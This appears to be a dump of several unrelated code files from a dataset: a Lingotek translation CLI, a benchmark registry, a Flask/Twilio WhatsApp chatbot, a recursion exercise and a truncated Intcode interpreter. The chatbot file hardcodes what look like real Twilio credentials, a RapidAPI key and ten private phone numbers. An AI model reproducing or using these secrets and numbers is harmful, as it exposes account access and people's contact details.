name of the locale as an extension to the file name. 
This is the default if the clone download option is active.\")\n@click.option('-x', '--xliff', flag_value=True, help=\"Download xliff version of the specified translation\")\n@click.argument('file_names', type=click.Path(exists=True), required=True, nargs=-1)\ndef download(auto_format, locales, locale_ext, no_ext, xliff, file_names):\n \"\"\" Downloads translated content specified by filename for specified locales, or all locales if none are specified. Change download options and folders using ltk config.\"\"\"\n try:\n action = download_action.DownloadAction(os.getcwd())\n init_logger(action.path)\n\n for name in file_names:\n action.download_by_path(name, locales, locale_ext, no_ext, auto_format, xliff)\n print(\"\\n\")\n\n except (UninitializedError, ResourceNotFound, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(short_help='Pulls translations for all added documents for all locales or by specified locales')\n@click.option('-a', '--auto_format', flag_value=True, help='Flag to auto apply formatting during download')\n@click.option('-e', '--locale_ext', flag_value=True, help=\"Specifies to add the name of the locale as an extension to the file name (ex: doc1.fr_FR.docx). This is the default unless the clone download option is active.\")\n@click.option('-n', '--no_ext', flag_value=True, help=\"Specifies to not add the name of the locale as an extension to the file name. This is the default if the clone download option is active.\")\n@click.argument('locales', nargs=-1)\ndef pull(auto_format, locale_ext, no_ext, locales):\n \"\"\" Pulls translations for all added documents for all locales or by specified locales \"\"\"\n try:\n download = download_action.DownloadAction(os.getcwd())\n action = pull_action.PullAction(os.getcwd(), download)\n init_logger(action.path)\n if locales:\n for locale in locales:\n action.pull_translations(locale, locale_ext, no_ext, auto_format)\n else:\n action.pull_translations(None, locale_ext, no_ext, auto_format)\n except UninitializedError as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(name=\"rm\", short_help=\"Disassociates local doc(s) from Lingotek Cloud and cancels the remote copy\")\n@click.argument('file_names', required=False, nargs=-1)\n@click.option('-d', '--directory', flag_value=True, help='Only remove directories, not files inside directories')\n@click.option('-i', '--id', flag_value=True, help='Cancels documents with the specified ids (instead of file names) on Lingotek Cloud. Can be used to cancel documents that are not locally tracked.')\n@click.option('-n', '--name', flag_value=True, help='Cancels documents with the specified names (instead of file names or paths) on Lingotek Cloud')\n@click.option('-a', '--all', flag_value=True, help='Cancels all documents from Lingotek Cloud that are found locally')\n@click.option('-l', '--local', flag_value=True, help='Deprecated. Use \\'ltk rm -f -a\\' for all documents or \\'ltk rm -f\\' for specific documents. (Legacy Usage: deletes all documents locally and cancels them in the Lingotek Cloud. 
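# --- Editor's note: illustrative sketch, not part of the original file. ---
# The --locale_ext/--no_ext flags above control whether a downloaded file is
# named like `doc1.fr_FR.docx`. A rough sketch of that naming rule; the helper
# name is hypothetical, not the connector's actual implementation:
import os

def locale_extended_name(file_name, locale):
    # doc1.docx + fr_FR -> doc1.fr_FR.docx
    base, ext = os.path.splitext(file_name)
    return '{}.{}{}'.format(base, locale, ext)

assert locale_extended_name('doc1.docx', 'fr_FR') == 'doc1.fr_FR.docx'
# --- end editor's note ---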
Can be used in association with --name to delete a specified document locally.)')\n@click.option('-r', '--remote', flag_value=True, help='Deletes specified documents from Lingotek Cloud instead of cancelling them')\n@click.option('-f', '--force', flag_value=True, help='Delete local copy when cancelling remote source documents')\ndef rm(file_names, **kwargs):\n \"\"\"\n Disassociates local doc(s) from Lingotek Cloud and removes them from the project by cancelling them. If the remote copy should be deleted, use the -r flag.\n \"\"\"\n try:\n action = rm_action.RmAction(os.getcwd())\n init_logger(action.path)\n if not file_names and not (('all' in kwargs and kwargs['all']) or ('local' in kwargs and kwargs['local'])):\n logger.info(\"Usage: ltk rm [OPTIONS] FILE_NAMES...\")\n return\n\n if len(file_names) > 0:\n file_names = remove_powershell_formatting(file_names)\n\n action.rm_action(file_names, **kwargs)\n except (UninitializedError, ResourceNotFound, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@ltk.command(short_help=\"Move file or directory at the specified location to a specified destination folder.\")\n@click.argument('source_path', type=click.Path(exists=True), required=True, nargs=-1)\n@click.argument('destination_path', required=True, nargs=1)\ndef mv(source_path, destination_path):\n \"\"\"\n Moves specified local doc to a specified destination directory, moving both the file itself and file location stored in the local database.\n If SOURCE_PATH is a directory, all added files in the directory will be moved.\n \"\"\"\n try:\n # action = actions.Action(os.getcwd())\n add = add_action.AddAction(os.getcwd())\n action = move_action.MoveAction(add, os.getcwd())\n init_logger(action.path)\n\n source_path = remove_powershell_formatting(source_path)\n #print(\"Source path \" + str(source_path))\n destination_path = remove_powershell_formatting(destination_path)\n #print(\"Destination path \"+str(destination_path))\n\n action.mv_action(source_path, destination_path)\n except(UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@ltk.command(name='import', short_help=\"Import docs from Lingotek\")\n@click.option('-a', '--all', 'import_all', flag_value=True, help='Import all documents from Lingotek Cloud')\n@click.option('-f', '--force', flag_value=True, help='Overwrites existing documents without prompt')\n@click.option('-p', '--path', type=click.Path(exists=True), help='Import documents to a specified path')\n@click.option('-t', '--track', flag_value=True, help='Automatically add the imported documents to local tracking if they were not already being tracked. Will not track cancelled documents. 
Note: They will be added without extra options (no srx id, no download folder, etc.)')\n@click.option('-c', '--no-cancel', flag_value=True, help='Don\\'t include documents that have been cancelled.')\ndef import_command(import_all, force, path, track, no_cancel):\n \"\"\"\n Import documents from Lingotek Cloud, by default downloading to the project's root folder\n \"\"\"\n # todo import should show all documents\n # add a force option so can import all force -- overwrites all existing documents without prompting\n # check if doc id\n # if exist, prompt for overwrite\n # else automatically re-name\n # possibly have to patch title in Lingotek Cloud?\n try:\n # action = actions.Action(os.getcwd())\n action = import_action.ImportAction(os.getcwd())\n init_logger(action.path)\n\n if path != None:\n path = remove_powershell_formatting(path)\n\n action.import_action(import_all, force, path, track, no_cancel)\n except(UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(short_help=\"Cleans up the associations between local documents and documents in Lingotek\")\n@click.option('-a', '--all', 'dis_all', flag_value=True, help='Removes all associations between local and remote documents and cancels those documents')\n@click.argument('file_paths', required=False, nargs=-1)\n@click.option('-f', '--force', flag_value=True, help='Deletes locally tracked documents that have been cancelled or no longer exist in Lingotek')\ndef clean(force, dis_all, file_paths):\n \"\"\"\n Cleans up the associations between local documents and documents in Lingotek.\n By default, removes documents from local tracking that have been cancelled or no longer exist locally or in the Lingotek Cloud.\n Enter file or directory names to cancel those documents and remove local associations of specific files or directories.\n \"\"\"\n try:\n action = clean_action.CleanAction(os.getcwd())\n init_logger(action.path)\n\n if len(file_paths) > 0:\n file_paths = remove_powershell_formatting(file_paths)\n\n action.clean_action(force, dis_all, file_paths)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@ltk.command(short_help=\"Copies added source folders for each locale\")\n@click.argument('folders', required=False, nargs=-1)\n@click.option('-c', '--copy_root', flag_value=True, help='Copies the root source folder as a subfolder inside the locale folder, even if there is only one source folder being cloned.')\ndef clone(folders, copy_root):\n \"\"\"\n Copies the folder structure of added folders or specified folders\n for each target locale as specified in config.\n Folders are added to the locale folder specified if one has been specified,\n or by default a new folder will be created with the name of the locale. If\n only one root folder is being cloned, then the locale folder is used\n (instead of creating a new folder inside of the locale folder).\n \"\"\"\n try:\n action = clone_action.CloneAction(os.getcwd())\n init_logger(action.path)\n if isinstance(folders,str):\n folders = [folders]\n\n if len(folders) > 0:\n folders = remove_powershell_formatting(folders)\n\n action.clone_action(folders, copy_root)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@ltk.command(short_help=\"Watches local and remote files\")\n# @click.option('-p', '--path', type=click.Path(exists=True), multiple=True, help='Specify a folder to watch. 
Use option multiple times to specify multiple folders.')\n@click.option('--ignore', multiple=True, help='Specify types of files to ignore. For multiple types, specify this flag multiple times. For example, to ignore pdf and html files, use \"ltk watch --ignore .pdf --ignore .html\"')\n@click.option('--auto', 'delimiter', help='Automatically detects locale from the file name; specify locale delimiter')\n@click.option('-t', '--timeout', type=click.INT, default=60,\n help='The amount of time watch will sleep between polls, in seconds. Defaults to 1 minute')\n@click.option('-n','--no_folders', flag_value=True, help='Ignore files added to watch folders and only watch documents that have already been added.')\n@click.option('-f','--force_poll', flag_value=True, help='Force API calls to Lingotek system at every poll for every document')\ndef watch(ignore, delimiter, timeout, no_folders, force_poll): # path, ignore, delimiter, timeout, no_folders):\n \"\"\"\n Watches local files added by ltk, and sends a PATCH when a document is changed.\n Also watches remote files, and automatically downloads finished translations.\n Automatically adds documents that are added to the watchfolder. Note: The add is performed without extra options (no srx id, no download folder, etc.)\n \"\"\"\n try:\n action = WatchAction(os.getcwd(), timeout)\n init_logger(action.path)\n action.watch_action(ignore, delimiter, no_folders, force_poll) #path, ignore, delimiter, no_folders)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n# Filters (Split into files, see http://bit.ly/2jArTRm)\n\n@click.group(short_help=\"List, create, update, or delete Lingotek filters\")\ndef filters():\n pass\n\n@filters.command(name='add',short_help=\"Create a filter on Lingotek.\")\n@click.argument('filename')\n@click.option('-t', '--type', 'filter_type', type=click.Choice(['FPRM','SRX','ITS']), help=\"The filter type being added. Must be one of the following: FPRM, SRX, ITS. 
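# --- Editor's note: illustrative sketch, not part of the original file. ---
# Per the help text of `filters add`, the -t/--type choice is FPRM, SRX, or
# ITS, and the type is otherwise detected from the file extension. A plausible
# sketch of such a lookup; the real detection lives in filters_action and may
# differ:
import os

FILTER_TYPES_BY_EXT = {'.fprm': 'FPRM', '.srx': 'SRX', '.its': 'ITS'}

def detect_filter_type(filename):
    ext = os.path.splitext(filename)[1].lower()
    return FILTER_TYPES_BY_EXT.get(ext)  # None when the type is unknown

assert detect_filter_type('segmentation.SRX') == 'SRX'
# --- end editor's note ---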
When not explicitly specified, the file extension is used to attempt to detect the type.\")\ndef filter_add(filename, filter_type):\n    \"\"\"Create filter on Lingotek.\"\"\"\n    try:\n        action = filters_action.FiltersAction(os.getcwd())\n        init_logger(action.path)\n        action.filter_add_action(filename, filter_type)\n    except (UninitializedError, RequestFailedError) as e:\n        print_log(e)\n        logger.error(e)\n        return\n\n@filters.command(name='save',short_help=\"Update filter on Lingotek.\")\n@click.argument('filter_id')\n@click.argument('filename')\ndef filter_save(filter_id, filename):\n    \"\"\"Update filter on Lingotek.\"\"\"\n    try:\n        action = filters_action.FiltersAction(os.getcwd())\n        init_logger(action.path)\n        action.filter_save_action(filter_id, filename)\n    except (UninitializedError, RequestFailedError) as e:\n        print_log(e)\n        logger.error(e)\n        return\n\n@filters.command(name=\"get\", short_help=\"Retrieve filter contents from Lingotek.\")\n@click.argument('filter_id')\n@click.argument('filename', required=False)\n@click.option('--info','info',flag_value=True, help=\"Retrieve filter info only.\")\n@click.option('--overwrite',flag_value=True, help=\"Overwrite local file when it already exists.\")\ndef filter_get(filter_id, filename, info, overwrite):\n    \"\"\"Retrieve the filter specified by FILTER_ID from Lingotek and store it in the current working directory as the title (or as the optional_filename when specified) of the filter\"\"\"\n    try:\n        action = filters_action.FiltersAction(os.getcwd())\n        init_logger(action.path)\n        if info:\n            action.filter_info_action(filter_id)\n        else:\n            action.filter_get_action(filter_id, filename, overwrite)\n    except (UninitializedError, RequestFailedError) as e:\n        print_log(e)\n        logger.error(e)\n        return\n\n@filters.command(name=\"list\")\ndef filter_list():\n    \"\"\"List default and custom filters.\"\"\"\n    try:\n        action = filters_action.FiltersAction(os.getcwd())\n        init_logger(action.path)\n        action.filter_list_action()\n    except (UninitializedError, RequestFailedError) as e:\n        print_log(e)\n        logger.error(e)\n        return\n\n@filters.command(name=\"rm\", short_help=\"Remove filter from Lingotek.\")\n@click.argument('filter_id')\ndef filter_rm(filter_id):\n    \"\"\"Remove the filter specified by FILTER_ID.\"\"\"\n    try:\n        action = filters_action.FiltersAction(os.getcwd())\n        init_logger(action.path)\n        action.filter_rm_action(filter_id)\n    except (UninitializedError, RequestFailedError) as e:\n        print_log(e)\n        logger.error(e)\n        return\n\nltk.add_command(filters)\n\n@click.group(short_help=\"Manages reference material attached to documents.\")\ndef reference():\n    pass\n\n@reference.command(name='add', short_help=\"Uploads reference material and attaches it to the specified document.\")\n@click.argument('filename')\n@click.option('-i', '--id', 'doc_id', flag_value=True, help=\"Adds reference material to the specified document ID instead of the specified filename.\")\ndef reference_add(filename, doc_id):\n    \"\"\"Adds reference material to a document on Lingotek.\"\"\"\n    try:\n        action = reference_action.ReferenceAction(os.getcwd())\n        init_logger(action.path)\n        action.reference_add_action(filename, doc_id)\n    except (UninitializedError, RequestFailedError) as e:\n        print_log(e)\n        logger.error(e)\n        return\n\n@reference.command(name='list', short_help=\"Lists the reference material that is currently attached to the specified document.\")\n@click.argument('filename')\n@click.option('-i', '--id', 'doc_id', flag_value=True, help=\"Lists reference material attached to the specified 
document ID instead of the specified filename.\")\ndef reference_list(filename, doc_id):\n \"\"\"Lists reference material attached to a document on Lingotek.\"\"\"\n try:\n action = reference_action.ReferenceAction(os.getcwd())\n init_logger(action.path)\n action.reference_list_action(filename, doc_id)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@reference.command(name='get', short_help=\"Downloads reference material that is currently attached to the specified document.\")\n@click.argument('filename')\n@click.option('-i', '--id', 'doc_id', flag_value=True, help=\"Downloads reference material attached to the specified document ID instead of the specified filename.\")\n@click.option('-a', '--all', 'get_all', flag_value=True, help=\"Skips the prompt and downloads all the reference material that is attached to the document.\")\n@click.option('-p', '--path', type=click.Path(exists=True), help='Download reference material to a specified path')\ndef reference_get(filename, doc_id, get_all, path):\n \"\"\"Downloads reference material attached to a document on Lingotek. Defaults to downloading them to the root of the project\"\"\"\n try:\n action = reference_action.ReferenceAction(os.getcwd())\n init_logger(action.path)\n action.reference_download_action(filename, doc_id, get_all, path)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@reference.command(name='rm', short_help=\"Removes reference material that is currently attached to the specified document\")\n@click.argument('filename')\n@click.option('-i', '--id', 'doc_id', flag_value=True, help=\"Removes reference material from the specified document ID instead of the specified filename.\")\n@click.option('-a', '--all', 'remove_all', flag_value=True, help=\"Skips the prompt and removes all the reference material from the document.\")\ndef reference_remove(filename, doc_id, remove_all):\n \"\"\"Deletes reference material attached to a document on Lingotek.\"\"\"\n try:\n action = reference_action.ReferenceAction(os.getcwd())\n init_logger(action.path)\n action.reference_remove_action(filename, doc_id, remove_all)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\nltk.add_command(reference)\n\nif __name__ == '__main__':\n ltk()\n","sub_path":"python2/ltk/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":45053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"599957484","text":"import TBC.benchmarks.kvs.RandomRW.RandomRW as RandomRW\nimport TBC.benchmarks.sql.RandomTransactions.RandomTransactions as RandomTransactions\nimport TBC.benchmarks.sql.sysbench.sysbench as sysbench\n\n_benchmarks = {\n 'RandomRW': {\n 'preload': RandomRW.get_preload,\n 'load': RandomRW.get_load,\n 'benchmark': RandomRW.get_benchmark,\n 'default_config': 'TBC/benchmarks/kvs/RandomRW/config.yaml'\n },\n 'RandomTransactions': {\n 'preload': RandomTransactions.get_preload,\n 'load': RandomTransactions.get_load,\n 'postload': RandomTransactions.get_postload,\n 'benchmark': RandomTransactions.get_benchmark,\n 'default_config': 'TBC/benchmarks/sql/RandomTransactions/config.yaml'\n },\n 'sysbench': {\n 'preload': sysbench.get_preload,\n 'load': sysbench.get_load,\n 'postload': sysbench.get_postload,\n 'benchmark': sysbench.get_benchmark,\n 'default_config': 'TBC/benchmarks/sql/sysbench/config.yaml'\n }\n}\n\ndef _noop(*args, **kwargs):\n \"\"\"\n 
No Op function, acts as a placeholder\n    \"\"\"\n    return\n\ndef get_benchmark_preload(benchmark, config):\n    \"\"\"\n    Get the function that should be called prior to loading (for single threaded use)\n    :param benchmark:\n    :param config:\n    :return:\n    \"\"\"\n    if 'preload' in _benchmarks[benchmark]:\n        return _benchmarks[benchmark]['preload'](config)\n    else:\n        return _noop\n\n\ndef get_benchmark_load(benchmark, config):\n    \"\"\"\n    Get the function that loads the database (for multithreaded use)\n    :param benchmark: the benchmark name\n    :return: a load function. This function accepts a config argument.\n    \"\"\"\n    if 'load' in _benchmarks[benchmark]:\n        return _benchmarks[benchmark]['load'](config)\n    return _noop\n\n\ndef get_benchmark_postload(benchmark, config):\n    \"\"\"\n    Get the function that should be called after loading (for single threaded use)\n    :param benchmark:\n    :param config:\n    :return:\n    \"\"\"\n    if 'postload' in _benchmarks[benchmark]:\n        return _benchmarks[benchmark]['postload'](config)\n    else:\n        return _noop\n\n\ndef get_benchmark(benchmark, config):\n    \"\"\"\n    Return a benchmark\n    :param benchmark: the benchmark name\n    :return: a benchmark Task (or a function that returns one)\n    \"\"\"\n    return _benchmarks[benchmark]['benchmark'](config)\n\n\ndef get_default_config(benchmark):\n    \"\"\"\n    Get the file path of the default configuration file for the benchmark\n    :param benchmark: the benchmark name\n    :return: the file path of the default configuration file\n    \"\"\"\n    return _benchmarks[benchmark]['default_config']\n","sub_path":"TBC/benchmarks/benchmark_locator.py","file_name":"benchmark_locator.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"91665940","text":"\"\"\"\nCreated on Tue Mar 24 21:44:39 2020\n\n@author: MahaKAAL\n\"\"\"\n\n\n\nimport requests\nfrom time import sleep\nfrom bs4 import BeautifulSoup\nfrom chatterbot import ChatBot\nfrom chatterbot.comparisons import levenshtein_distance, jaccard_similarity, sentiment_comparison, synset_distance\nfrom chatterbot.response_selection import get_first_response\nfrom flask import Flask, request\nfrom twilio.twiml.messaging_response import MessagingResponse\nfrom twilio.rest import Client\nimport datetime\nfrom concurrent.futures import ThreadPoolExecutor\nimport pytz\nimport json\n\n\n\nexecutor = ThreadPoolExecutor(3)\nexecuted=False\nwished=False\ngn=False\ngm=False\nbot = ChatBot(\n\t'Tomato',\n\tstorage_adapter='chatterbot.storage.SQLStorageAdapter',\n\tdatabase_uri='sqlite:///update_corpus_database.sqlite3',\n\n\tpreprocessors=[\n\t\t'chatterbot.preprocessors.clean_whitespace'\n\t],\n\n\tlogic_adapters=[\n\t\t{\n\t\t\t\"import_path\": \"chatterbot.logic.BestMatch\",\n\t\t\t\"statement_comparison_function\": synset_distance,\n\t\t\t\"response_selection_method\": get_first_response,\n\t\t\t'default_response': 'I am sorry, but I do not understand.',\n\t\t\t'maximum_similarity_threshold': 0.50\n\t\t},\n\t\t{\n\t\t\t\"import_path\": \"chatterbot.logic.BestMatch\",\n\t\t\t\"statement_comparison_function\": sentiment_comparison,\n\t\t\t\"response_selection_method\": get_first_response,\n\t\t\t'default_response': 'I am sorry, but I do not understand.',\n\t\t\t'maximum_similarity_threshold': 0.50\n\t\t},\n\t\t{\n\t\t\t\"import_path\": 
\"chatterbot.logic.MathematicalEvaluation\",\n\t\t}\n\t],)\n\n\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef hello():\n\treturn \"Hello folks! This is a new api of chatbot, Tomato. Just request a post method at /sms and get your reply.\"\n\n\n\n@app.route(\"/sms\", methods=['POST'])\ndef sms_reply():\n\tmsg = request.form.get('Body')\n\tprint(msg)\n\treply=''\n\tif(msg!=None):\n\t\tif(('corona' in msg.lower().split())and(('stats' in msg.lower().split())or ('statistics' in msg.lower().split()) or ('news' in msg.lower().split()) or ('updates' in msg.lower().split()) or ('update' in msg.lower().split()) or ('statistic' in msg.lower().split()) or ('stat' in msg.lower().split()))):\n\t\t\tmsg_body = show_all()\n\t\t\tfirst_part_body = msg_body[0][:1600]\n\t\t\tsecond_part_body = msg_body[0][1600:]\n\t\t\tthird_part_body = msg_body[1]\n\t\t\tif('world' in msg.lower().split()):\n\t\t\t\treply=first_part_body\n\t\t\telse:\n\t\t\t\treply=third_part_body\n\t\telif('joke' in msg.lower().split() or 'jokes' in msg.lower().split()):\n\t\t\turl = \"https://jokeapi.p.rapidapi.com/category/Any\"\n\t\t\tquerystring = {\"format\": \"json\"}\n\t\t\theaders = {\n\t\t\t\t'x-rapidapi-host': \"jokeapi.p.rapidapi.com\",\n\t\t\t\t'x-rapidapi-key': \"e31b809e20mshf1eb77a4f8b2f7fp1aa244jsnf67574dab9be\"\n\t\t\t}\n\t\t\tjoke_response = requests.request(\"GET\", url, headers=headers, params=querystring)\n\t\t\tprint(joke_response.text)\n\t\t\tjoke_response_json=json.loads(joke_response.text)\n\t\t\tif(joke_response_json.get('joke')==None):\n\t\t\t\treply=joke_response_json.get('setup')+\"\\n\"+joke_response_json.get('delivery')\n\t\t\telse:\n\t\t\t\treply=joke_response_json.get('joke')\n\t\telif('schedule' in msg.lower().split() and 'all' in msg.lower().split()):\n\t\t\trequests.get(\"http://tomatotalk.herokuapp.com/jobs\")\n\t\t\treply=\"Alarms & Wishes are all set.\"\n\t\telse:\n\t\t\treply=bot.get_response(msg)\n\t\t\tprint(reply)\n\tresp = MessagingResponse()\n\tresp.message(str(reply))\n\treturn str(resp)\n\n\n@app.route('/jobs')\ndef run_jobs():\n executor.submit(alarms)\n executor.submit(wishesGm)\n executor.submit(wishesGn)\n return 'Alarms are launched in background!'\n\n\ndef wishesGm():\n\tglobal gm\n\tif(gm==False):\n\t\tgm=True\n\t\ttz = pytz.timezone('Asia/Kolkata')\n\t\tdt = datetime.datetime\n\t\tyour_now = dt.now(tz)\n\t\twish='Good Morning'\n\t\tif(your_now.hour>6 or (your_now.hour==6 and your_now.minute>30)):\n\t\t\tsleeping_time=(29-your_now.hour)*3600+(29-your_now.minute)*60+(59-your_now.second)\n\t\telse:\n\t\t\tsleeping_time = (6 - your_now.hour) * 3600 + (29 - your_now.minute) * 60 + (59 - your_now.second)\n\t\tprint(\"Wishes are scheduled\")\n\t\tprint('gm '+str(sleeping_time))\n\t\tsleep(sleeping_time)\n\t\tcreateMessage(wish)\n\t\tprint(\"Already done Wishing.\")\n\t\tgm=False\n\n\ndef wishesGn():\n\tglobal gn\n\tif(gn==False):\n\t\tgn=True\n\t\ttz = pytz.timezone('Asia/Kolkata')\n\t\tdt = datetime.datetime\n\t\tyour_now = dt.now(tz)\n\t\twish='Good Night'\n\t\tif(your_now.hour>22 or (your_now.hour==22 and your_now.minute>=30)):\n\t\t\tsleeping_time=(45-your_now.hour)*3600+(29-your_now.minute)*60+(59-your_now.second)\n\t\telse:\n\t\t\tsleeping_time = (22 - your_now.hour) * 3600 + (29 - your_now.minute) * 60 + (59 - your_now.second)\n\t\tprint(\"Wishes are scheduled\")\n\t\tprint('gn ' + str(sleeping_time))\n\t\tsleep(sleeping_time)\n\t\tcreateMessage(wish)\n\t\tprint(\"Already done Wishing.\")\n\t\tgn=False\n\ndef alarms():\n\tglobal executed\n\tif(executed==False):\n\t\texecuted = 
True\n\t\tdt=datetime.datetime\n\t\ttz = pytz.timezone('Asia/Kolkata')\n\t\tyour_now = dt.now(tz)\n\t\tif(your_now.hour>6 or (your_now.hour==6 and your_now.minute>30)):\n\t\t\tsleeping_time=(29-your_now.hour)*3600+(29-your_now.minute)*60+(59-your_now.second)\n\t\telse:\n\t\t\tsleeping_time=(6-your_now.hour)*3600+(29-your_now.minute)*60+(59-your_now.second)\n\t\tprint(\"Corona Alarms are scheduled!\")\n\t\tprint('alarms ', str(sleeping_time))\n\t\tsleep(sleeping_time)\n\t\tmsg_body = show_all()\n\t\tfirst_part_body=msg_body[0][:len(msg_body[0]) // 2]\n\t\tcreateMessage(first_part_body)\n\t\tsecond_part_body=msg_body[0][len(msg_body[0]) // 2:]\n\t\tcreateMessage(second_part_body)\n\t\tthird_part_body=msg_body[1]\n\t\tcreateMessage(third_part_body)\n\t\tprint(\"Updates Posted\")\n\t\texecuted=False\n\ndef download_world_data():\n\ta = requests.get(\"https://www.worldometers.info/coronavirus/\")\n\tgot_data = a.text\n\tsoup = BeautifulSoup(got_data, 'html.parser')\n\tdata = soup.prettify()\n\tpage_title = str(soup.title)\n\tpage_title = page_title[7:-22]\n\n\tworld_data = []\n\tfor a in soup.find_all('table', attrs={'id': 'main_table_countries_today'}):\n\t\tfor b in a.find_all('tr'):\n\t\t\tworld_data.append(b.text.strip().split('\\n'))\n\treturn world_data\n\ndef download_ind_data():\n\ta1 = requests.get(\"https://www.mohfw.gov.in/\")\n\tgot_data2 = a1.text\n\tsoup2 = BeautifulSoup(got_data2, 'html.parser')\n\tdata2 = soup2.prettify()\n\tpage_title2 = \"CoronaVirus Update (Live): India State-wise\"\n\n\tdownload_data = []\n\tfor x in soup2.find_all('div', attrs={'id': 'cases'}):\n\t\tfor y in (x.find_all('div', attrs={'class': 'table-responsive'})):\n\t\t\tfor z in (y.find_all('tr')):\n\t\t\t\tdownload_data.append(z.text.strip().split('\\n'))\n\treturn download_data\n\ndef format_world_data():\n\tworld_data = download_world_data()\n\tobjects = []\n\tmydict = {}\n\tfor x in range(1, len(world_data) - 1):\n\t\tfor y in range(5):\n\t\t\tif (world_data[x][y] == '' or world_data[x][y] == ' '):\n\t\t\t\tmydict[world_data[0][y]] = '0'\n\t\t\telse:\n\t\t\t\t# 6 print(world_data[x][y])\n\t\t\t\tmydict[world_data[0][y]] = world_data[x][y].strip()\n\n\t\tobjects.append(mydict)\n\t\tif (mydict['Country,Other'] == \"India\"):\n\t\t\tbreak\n\t\tmydict = {}\n\treturn objects\n\n\ndef format_ind_data():\n\tdownload_data = download_ind_data()\n\tobjects = []\n\tmydict = {}\n\tfor x in range(1, len(download_data) - 1):\n\t\tfor y in range(1, 6):\n\t\t\tif (download_data[x][y] == '' or download_data[x][y] == ' '):\n\t\t\t\tmydict[download_data[0][y]] = '0'\n\t\t\telse:\n\t\t\t\t# print(download_data[x][y])\n\t\t\t\tmydict[download_data[0][y]] = download_data[x][y].strip()\n\n\t\tobjects.append(mydict)\n\t\tmydict = {}\n\treturn objects\n\n\ndef show_world_data():\n\tvalues_got1 = format_world_data()\n\treturning = \"\"\n\tfor x in values_got1:\n\t\treturning += (x.get('Country,Other') + \"\\n\" + \"Total Cases: \" + x.get(\n\t\t\t'TotalCases') + \"\\n\" + 'Total Deaths: ' + x.get('TotalDeaths') + \"\\n\\n\")\n\treturn returning\n\n\ndef show_ind_data():\n\tvalues_got2 = format_ind_data()\n\treturning = \"\"\n\tfor x in values_got2:\n\t\treturning += (x.get('Name of State / UT') + \"\\n\" + \"Total Cases: \" + x.get(\n\t\t\t'Total Confirmed cases *') + \"\\n\" + 'Total Deaths: ' + x.get('Death') + \"\\n\\n\")\n\treturn returning\n\n\ndef show_all():\n\ta = requests.get(\"https://www.worldometers.info/coronavirus/\")\n\tgot_data = a.text\n\tsoup = BeautifulSoup(got_data, 'html.parser')\n\tdata = 
soup.prettify()\n\tpage_title = str(soup.title)\n\tpage_title = page_title[7:-22]\n\tpage_title2 = \"CoronaVirus Update (Live): India State-wise\"\n\tmain_data1=page_title + \"\\n\\n\" + show_world_data()\n\tmain_data2=page_title2 + \"\\n\\n\" + show_ind_data() + \"\\n\\nStay Safe At Home.\"\n\treturn ([main_data1,main_data2])\n\ndef createMessage(msg_body):\n\tpnlist=['+919635270177','+917908483889','+919679995500','+918436858480','+917001291866','+919732248317','+918609016486','+918579926004','+919434362217','+919851509075']\n\taccount_sid = 'AC40f1ae77f284fb9522f629b5454cb991'\n\tauth_token = 'a6aa50dc31dc4e954c5dd2c9ef7f8ff9'\n\tclient = Client(account_sid, auth_token)\n\tfor x in pnlist:\n\t\tmessage = client.messages.create(from_='whatsapp:+14155238886',body=msg_body,to='whatsapp:'+x)\n\nif __name__ == \"__main__\":\n\tapp.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"10994611","text":"# 7. Given a string, compute recursively (no loops) a new string where all the\n# lowercase 'x' chars have been changed to 'y' chars.\n\ndef x_to_y(string):\n first_letter = string[0]\n if len(string) == 1:\n if string == \"x\":\n string = \"y\"\n return string\n else:\n if first_letter == \"x\":\n first_letter = \"y\"\n return first_letter + x_to_y(string[1:len(string)])\n\nprint(x_to_y(\"xevlkjhcyyyljhlihxxx\"))\n","sub_path":"08a recursive_python/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"91628119","text":"class Computer:\n def __init__(self, memory, inputs):\n self.memory = memory + 10000*[0]\n self.ip = 0\n self.inputs = inputs\n self.outputs = []\n self.finished = False\n self.relative_base = 0\n def run(self):\n while not self.step():\n pass\n return self.outputs\n \n def step(self):\n code = self.memory[self.ip]\n if code % 100 == 99:\n self.finished = True\n return True\n elif code % 100 == 1:\n self.add(code)\n elif code % 100 == 2:\n self.multiply(code)\n elif code % 100 == 3:\n self.read_input(code)\n elif code % 100 == 4:\n self.output(code)\n elif code % 100 == 5:\n self.jmp(code)\n elif code % 100 == 6:\n self.jmpe(code)\n elif code % 100 == 7:\n self.lt(code)\n elif code % 100 == 8:\n self.equals(code)\n elif code % 100 == 9:\n self.adjust_relbase(code)\n else:\n raise Exception(\"Invalid opcode\")\n\n def get_value(self, address, mode):\n if mode == 0:\n return self.memory[self.memory[address]]\n elif mode == 1:\n return self.memory[address]\n elif mode == 2:\n return self.memory[self.memory[address]+self.relative_base]\n else:\n raise Exception(\"Invalid parameter mode\")\n\n def set_value(self, value, address, mode):\n if mode == 0:\n self.memory[self.memory[address]] = value\n elif mode == 2:\n self.memory[self.memory[address]+self.relative_base] = value\n else:\n raise 